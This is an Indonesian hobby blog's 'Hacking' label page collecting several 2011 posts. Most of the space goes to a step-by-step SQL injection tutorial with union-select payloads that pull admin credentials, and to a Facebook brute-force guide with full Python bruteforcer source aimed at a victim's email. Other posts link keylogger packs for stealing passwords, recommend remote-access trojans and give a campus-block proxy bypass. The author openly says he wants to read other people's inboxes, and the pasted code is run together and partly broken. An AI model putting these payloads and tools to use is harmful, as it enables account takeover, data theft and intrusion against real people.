Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Kamis, 07 Juli 2011

Mempercepat Koneksi Tekomflash

Kalo koneksi intetnet kamu pakai telkomflash, pasti ngerasa kesel banget kan kalo quotanya dah abis buat download pasti lolanya gak ketulungan, untuk download file 4MB aja harus nunggu 15menit bau selesai padahal itu juga dah pake IDM yang membuat koneksi buat browsingnya jadi lambat, nah disini ane coba kasih trik yang mungkin bisa berguna bagi agan agan sekalian trik ini ane kutip dari kaskus forum favorit ane, dah gak usah basa basi lagi langsung ikuti triknya gan

# siapin tool buat loncatin kodok nya (mdma dan dan reconnect dial ---> cari sendiri di google ya) >> trik yg masih ampuh sampe saat ini buat sedot bandwith si kampredd...!!(kampredd=telkomflash)

# pada mdma set gprs/edge only terlebih dahulu..

# dial si kampret dr reconnect dial..ini di gunakan untuk jaga2 disco ya gan...

# setelah konek cek ip client nya,,kalo ane seh demen sama kepala 182 pada paket ini

# selanjut nya buka broser agan,, lalu masuk link speedtest,,, misalnya http://speedtest.indosatm2.com/ atau link2 lain yg menyediakan speedtest bandwith kita....

# silahkan mulai speedtest dengan klik start pada link td

# untuk mendapatkan bandwith yg kenceng,,,koneksi agan sampe disini harus tetep gprs/edge only..

# begitu hasil angka PING keluar pada speedtest td,,,skrng agan pindah kan koneksi nya pada 3G only pada aplikasi mdma nya...

Jumat, 13 Mei 2011

Tips Membuka Situs Yang Diblock

Dikampus ane ada beberapa situs yang diblock oleh admin wifinya, salah satu situs yang diblock adalah semua jenis situs jejaring sosial termasuk facebook, kesel juga kan gan?? dah bayaar kuliah mahal mahal eh akses internetnya dibatasin, kalo yang diblock situs pornografi sih gapapa pi ini situs jejaring sosial yang gak pernah ane telat untuk mengaksesnya dan satu lagi situs yang diblock yaitu indowebster, eh sori ko malah curhat langsung aja deh gan ikuti triknya yang ane kutip dari sini

Caranya untuk membuka akses blokir cukup mudah karena hanya menggunakan jasa website pihak ke tiga untuk membantu membukakan jalan kita dengan proxy. Buka situs-situs contoh di bawah ini dan masukkan link url situs web yang mau kita kunjungi namun tidak bisa.

- anonymouse.org
- proxybrowsing.com
- w3privacy.com
- ninjacloak.com
- the-cloak.com
- shadowsurf.com
- proxify.com dll

Dengan cara ini pun kita bisa berselancar di dunia maya dengan aman karena informasi tentang di mana kita mengakses internet, catatan kunjungan, informasi pribadi kita, dsb bisa dirahasiakan dengan baik. Namun mungkin ada beberapa situs yang tidak mau menerima koneksi semacam ini. Selain itu jangan gunakan teknik ini untuk tindak kriminal / kejahatan karena yang pasti akan terungkap juga.

Senin, 09 Mei 2011

Hacker-Hacker Terbaik Didunia 2011

Hacker, mendengar kata itu kebanyakan orang akan menganggap kalo profesi tersebut adalah profesi jahat yang tidak patut untuk ditiru padahal sebenarnya pengertian hacker itu sendiri adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan, terlepas dari kejahatan yang mereka perbuat itu tergantung masing masing orangnya mau menggunakan ilmu itu untuk kebaikan atau kejahatan, berikut nama nama hacker yang ane kutip dari sini

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.
Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.
Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.
Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.

7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.
Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University.
Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.
Ditangkap Interpol di Heathrow Airport pada tahun 1995

10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.

11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.

12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik danmenanti untuk dipecahkan”.

14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.

Selasa, 03 Mei 2011

Hack Website Dengan Tekhnik SQL Injection

Tutorial ini sebenarnya ane dah tau lama, cuman pas ane praktekin eh lupa lagi, maklum masih newbie jadi sering sering lupa, akhirnya ane browsing lagi deh wat nyari tutorialnya, setelah sekian lma akhirnya nemu juga blog yang bahas ni tutrial ini nih blognya, ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
---------------------------------------------------

begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC


oke selamat mencoba.
terpenting jangan dilakukan di web teman anda ataupun di website Lokal.

referensi :
. http://jasakom.com
. http://ezine.echo.or.id
. http://cruzenaldo.co.cc
. http://students.ee.itb.ac.id

Senin, 02 Mei 2011

Cara Hack Facebook Menggunakan Bruteforce

Iseng iseng ane coba nyari cara buat mencuri password facebook orang, ane gak berniat jahat untuk ngerusak fb orang cuma sekedar pengen intip isi inboxnya doang, heeeeeee maklumlah ane orangnya penasaranan, setelah sekian lama ane browsing akhirnya nemu juga walaupun cara ini agak sedikit rumit tapi gapapalah itung itung buat belajar juga,
oke gak usah banyak basa basi lagi cekibrot gan

PERTAMA:
Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.
KEDUA:
Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com :
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.

Facebook BruteForce Script

Simple Dictionary Attack

Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory


setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.


Jika sudah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.

Ketiga


Silakan download FbBruteforce:
Berikut Codenya:

#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\bruteforcer...Programmer : %sVersion : %s''' % (__programmer__, __version__)option = '''Usage : %s [options]Option : -u, --username | User for bruteforcing-w, --wordlist | Wordlist used for bruteforcing-v, --verbose | Set %s will be verbose-p, --proxy | Set http proxy will be use-k, --usernameproxy | Set username at proxy will be use-i, --passproxy | Set password at proxy will be use-l, --log | Specify output filename (default : fbbruteforcer.log)-h, --help | Print this helpExample : %s -u brad@hackme.com -w wordlist.txt"P.S : add "&" to run in the background''' % (sys.argv[0], sys.argv[0], sys.argv[0])hme = '''Usage : %s [option]-h or --help for get help''' % sys.argv[0]def helpme():print facebookprint optionfile.write(facebook)file.write(option)sys.exit(1)def helpmee():print facebookprint hmefile.write(facebook)file.write(hme)sys.exit(1)for arg in sys.argv:try:if arg.lower() == '-u' or arg.lower() == '--user':username = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-w' or arg.lower() == '--wordlist':wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-l' or arg.lower() == '--log':log = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-p' or arg.lower() == '--proxy':useproxy = Trueproxy = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-k' or arg.lower() == '--userproxy':usepassproxy = Trueusw = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-i' or arg.lower() == '--passproxy':usepassproxy = Trueusp = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-v' or arg.lower() == '--verbose':verbose = Trueelif arg.lower() == '-h' or arg.lower() == '--help':helpme()elif len(sys.argv) <= 1:helpmee()except IOError:helpme()except NameError:helpme()except IndexError:helpme()def bruteforce(word):try:sys.stdout.write("\r[*] Trying %s... " % word)file.write("[*] Trying %s\n" % word)sys.stdout.flush()br.addheaders = [('User-agent', random.choice(ouruseragent))]opensite = br.open(fblogin)br.select_form(nr=0)br.form['email'] = usernamebr.form['pass'] = wordbr.submit()response = br.response().read()if verbose:print responseif success in response:print "\n\n[*] Logging in success..."print "[*] Username : %s" % (username)print "[*] Password : %s\n" % (word)file.write("\n[*] Logging in success...")file.write("\n[*] Username : %s" % (username))file.write("\n[*] Password : %s\n\n" % (word))sys.exit(1)except KeyboardInterrupt:print "\n[*] Exiting program...\n"sys.exit(1)except mechanize._mechanize.FormNotFoundError:print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")sys.exit(1)except mechanize._form.ControlNotFoundError:print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")sys.exit(1)def releaser():global wordfor word in words:bruteforce(word.replace("\n",""))def main():global brglobal wordstry:br = mechanize.Browser()cj = cookielib.LWPCookieJar()br.set_cookiejar(cj)br.set_handle_equiv(True)br.set_handle_gzip(True)br.set_handle_redirect(True)br.set_handle_referer(True)br.set_handle_robots(False)br.set_debug_http(False)br.set_debug_redirects(False)br.set_debug_redirects(False)br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)if useproxy:br.set_proxies({"http": proxy})if usepassproxy:br.add_proxy_password(usw, usp)if verbose:br.set_debug_http(True)br.set_debug_redirects(True)br.set_debug_redirects(True)except KeyboardInterrupt:print "\n[*] Exiting program...\n"file.write("\n[*] Exiting program...\n")sys.exit(1)try:preventstrokes = open(wordlist, "r")words = preventstrokes.readlines()count = 0while count < len(words):words[count] = words[count].strip()count += 1except IOError:print "\n[*] Error: Check your wordlist path\n"file.write("\n[*] Error: Check your wordlist path\n")sys.exit(1)except NameError:helpme()except KeyboardInterrupt:print "\n[*] Exiting program...\n"file.write("\n[*] Exiting program...\n")sys.exit(1)try:print facebookprint "\n[*] Starting attack at %s" % time.strftime("%X")print "[*] Account for bruteforcing %s" % (username)print "[*] Loaded :",len(words),"words"print "[*] Bruteforcing, please wait..."file.write(facebook)file.write("\n[*] Starting attack at %s" % time.strftime("%X"))file.write("\n[*] Account for bruteforcing %s" % (username))file.write("\n[*] Loaded : %d words" % int(len(words)))file.write("\n[*] Bruteforcing, please wait...\n")except KeyboardInterrupt:print "\n[*] Exiting program...\n"sys.exit(1)try:releaser()bruteforce(word)except NameError:helpme()if __name__ == '__main__':main()



Membobol Password Facebook Dengan Keylogger

Apa itu keylogger? sebenarnya keylogger itu semacam software yang digunakan untuk memantau kegiatan keyboard komputer, setiap tombol yang di tekan oleh user maka semua record akan di simpan dengan keylogger.

Buat para orang tua biasa nya mereka memantau anak nya yang sedang browsing dengan cara memasang keylogger di komputer, jadi semua situs yang di “search” oleh si anak akan terekam oleh keylogger. sehingga semua situs yang berbau porno bisa langsung ketahuan oleh si orang tua.


Biasa nya keylogger akan di deteksi sebagai vrus oleh “antivirus”, karena memang keylogger bisa menjadi 2 mata pisau yang bisa MENGAMANKAN dan juga bisa MEMATIKAN.


Maksud nya mematikan adalah, keylogger bisa saja di gunakan oleh orang-orang yang tidak bertanggung jawab untuk melakukan hacking, banyak orang ingin mencoba melakukan hack pada situs social networking seperti facebook dan friendster.


Jadi tinggal di instal di komputer lalu orang yang menggunakan komputer tersebut akan terekam seluruh kegiatan nya termasuk kegiatan memasukkan “password dan username” facebook dan friendster. bisa saja hal ini dilakukan oleh para pemilik warnet yang iseng dan tidak bertanggung jawab, atau bisa saja dilakukan oleh si pengguna komputer sebelum nya dengan cara mematikan fungsi antivirus nya terlebih dahulu lalu kemudian menginstall keylogger.


Untuk mencari keylogger bisa di cari di kotak kiri sebelah atas dengan kata kunci “keylogger”, nah kalo udah download jangan di pake buat yang negatif-negatif ya…ini hanya buat contoh saja.




Nah, ada beberapa cara untuk menghindari cara pencurian “privacy” seperti ini:


1. Download disini


2. Simpan baik-baik aplikasi tersebut di flashdisk anda dan ketika anda ingin mengisi username dan password di facebook atau friendstersilahkan jalankan aplikasi tersebut, maka keylogger pun akan ter-enkripsi (teracak-acak) dalam menyimpan kegiatan keyboard kita. sehingga keylogger tidak akan bisa mencuri password dan username kita.


Untuk mendownload keyloggernya bisa di download di

http://rapidshare.com/files/191921436/Aio_Keyloggers_Pack.part1.rar


http://rapidshare.com/files/191921441/Aio_Keyloggers_Pack.part2.rar

Source

Jumat, 29 April 2011

Hack Photo Private Profile Facebook

Mungkin temen temen pernah mengalami apa yang pernah ane alamin, Mencari temen lama difacebook pas dah dapet namanya dan untujk memastikan dia itu temen kita atau bukan kita pasti melihat poto profilnya,tapi pas kita mau liat eh poto profilnya malah diprivate so kita jadi gak bisa mastiin apakah dia temen kita apa bukan, nah nih ane ada sedikit trik agar kita bisa melihat poto pto yang diprivate sama sang pemilik, ane kutip dari sini
oke gak usah banyak basa basi langsung ikuti langkah langkah berikut ini
1. Download dan instal Greasmonkey Addon
2. Dwnload dan Install Java Script
3. Restart Firefox
Tools hack ini akan menambahkan link di atas foto tersebut dengan link “See this Photo in its Album” di album nya. Nah tinggal di klik ajah
Silahkan dicoba semoga berhasil

Software Untuk Melacak Nomer Hp

yang mau melacak nomor spam yang sering nyangkut di HP ??
ini dia solusinya hehehehehe
kadang tiba2 ada sms masuk yang ga penting banget dan ga tahu siapa itu yang ngirim.

kemarin hari teman saya sempat kena tipu dari pengirim sms penipuan yang berkedok hadiah 75juta, secara siapa yang ga tertarik? betull ngga?

tidak lama kemudian teman saya datang dan bilang.
ehhhh, gw dapat 75juta dari operator ini (maaf ga perlu disebut).

langsung saya lihat nomornya dan
memang ternyata hanya penipuan.
saya telpon orangnya, dng lemah lembut dari kata-katanya sampai saya ga kerasa kena hipnotis hehehehehe

langsung dehh ingat2
salah satu tool dari Family_code (xcode)
silahkan download dibawah ini.
http://www.ziddu.com/download/8961646/kodeareanomorhp.zip.html

silahkan dicoba semoga bermanfaat
Sumber

Kamis, 21 April 2011

Membobol File Rar Dan Zip Yang Dikasih Password

Sering banged ane ngerasa gedeg ama situs yang ngasih link download tapi pas dah cape download eh malah dikasih pasword tu file, kalo filenya kecil sih mungkin gak masalah tapi kalo filenya puluhan mega???gedeg sangad kan gan? nah pas ane lagi browsing browsing gak jelas ane nyangkut disitus ini yang ngasih tau gimana cara mendapatkan password tersebut, oke langsung aja gan kita praktekin
pertama download dulu utility yang bernama Rarcrack disiniDengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci. setelah didownload jalankan rarcrack pada linux, kalo agan gak make linux agan ketemen agan yang make linux terus ekstrak deh tu file dilinux temen agan dengan cara RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..selesai . . .
Silahkan dicoba gan, semoga bermanfaat

Cerita Perjalanan Seorang Newbie Menjadi Hacker

beberapa hari ini saya sangat susah sekali mengisi lembaran baru di blog ini. tepat dihari bebas ini aku bisa setidaknya mengisi kembali hehehehe

saya sangat heran beberapa hari ini?
banyak teman saya yang sering kehilangan akun facebook. dan ironisnya menuduh saya hehe padahal ane kan juga ga bisa hacking kaya yang di tipi2 :p
lahh hayoo sapa yang pengen belajar hacking tp bingung gmn?
lanjuttt ......

Dibawah ini adalah cerita perjalanan seorang newbie menjadi seorang hacker yang gunda gulana memulai dari mana aku ini untuk menjadi seorang hacker?
cerita ini saya dapatkan langsung dari http://forum.xcode.or.id
Semoga cerita dibawah ini dapat membuat anda terinspirasi :D
Bagi seorang newbie, (seperti saya) semua hal itu sulit...
Kita pasti bertanya-tanya
"Darimana aku harus memulai??"
"Kapan aku bisa??"
"Apa yang kubutuhkan untuk hacking ??"
"Bagaimana cara menghack ini??"
Setelah kita merasa kita tidak bisa apa-apa, kita pasti langsung menyerah...
Tapi jika dilandasi dengan kemauan yang keras, kita pasti BISA!!
Lagipula, semua ilmu tidak bisa didapat apabila tidak belajar.

Nah, semoga dengan yang saya post di sini, teman2 akan tetap percaya bahwa, tidak ada hal yang tidak mungkin selagi kita berjuang. Ada kemauan ada jalan.

Sudah ah!! langsung to the point ajah...
Berikut yang bisa kawan2 pelajari... *dimulai dari yang paling basic.*

Google, sahabat para hacker.
Nah, kalian semua pasti kenal sama Google, situs satu ini bagaikan anak panah yang akan mengenai sasaran dengan tepat, dengan Googling, kita bisa mendapat ilmu yang sangat berguna, Google juga bisa untuk melakukan beberapa teknik hacking. Teknik tersebut bisa dipelajari di subforum google hacking.

http://www.google.com

Wikipedia, sumber ilmu
Wikipedia bukanlah kamus, tapi ensiklopedi, teman2 bisa mengetahui hal-hal yang belum tahu definisinya, misalkan kalian tidak tahu apa itu SQL Injection, teman2 bisa pakai wikipedia.

http://www.wikipedia.org

Spamlaw, Kamus kita
Spamlaw jugas berguna untuk mencari arti2 kata yg berhubungan dengan IT.
Teman2 bisa mudah untuk mengetahui sesuatu dari sini.

http://glossary.spamlaws.com

Forum, tempat share kita
Kalau sudah dapat ilmu atau apa, mari bahas bareng2 di forum, Forum bisa membuat kita lebih mengerti atau memperjelas sesuatu, bisa tanya langsung ama master jika belum tahu.

http://forum.xcode.or.id

Video, boleh juga
Kalau yang satu ini adalah tutorial hidup, maksudnya, tutorial yang praktek langsung, bisa lebih tahu atau lebih jelas.. biasanya yang suka share video tuh si abah.

http://www.youtube.com

Cmd dan Batch
Apakah kalian tahu, command prompt adalah alat hack yang sangat amat ampuh?? Kalian bisa pelajari yang satu ini,
Bagus banget lho, Kamu bisa bkin virus, dll.

Cain and Abel..
Tools ini wajib dimiliki, pokoknya banyak gunanya,

www.oxid.it/cain.html

Keylogger
Nah, kalo yang satu ini pasti semua sudah tahu, iya keylogger berguna untuk merekam apa yang diketik seseorang, bisa untuk mencuri password, dsb..

Remote Acccess Tools
RAT biasa disebut sebagai trojan, tools ini berfungsi untuk mengendalikan komputer orang lain dari jarak jauh. Jika kita menggunakan RAT, ada dua program yang kita butuhkan yakni server dan client.
Server adalah program yang kita jalankan di komputer orang untuk mengendalikannya melalui client.
Banyak yang dapat kita gunakan sebagai RAT seperti ProRat, Beast, dll.

OphCrack
Yang satu ini bisa untuk mengcrack password user di windows, tidak wajib, tapi lebih baik punya... tools ini harus diburn di cd, atau diboot menggunakan disket atau Flashdisk.

Itulah yang bisa saya sampaikan, tapi ingat!!
"Tools tidak membuat seseorang menjadi hacker, tapi hackerlah yang membuat tools."

bagaiamana?
semangat terus saudaraku .... gapailah citamu ;)
ingat hacker adalah seni, kreatiflah dan kembangkan seni.mu hahaha :D
Sumber:http://pedasmaniscinta.blogspot.com/2010/06/cerita-perjalanan-seorang-newbie.html

Rabu, 15 Desember 2010

Belajar Hacking Dari Nol

Iseng iseng nyari artikel tentang hacking ane dibawa kesitus ini gan
Satu hal yang harus di ketahui .. ini artikel Bukan untuk mengajari kalian berbuat jahat,
Tapi agar kalian tahu dan mengerti dari pada Sang Hacker dapat mengambil ahli Facebook/email Bahkan kartu credit Kamu..
Sebenarnya sih Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
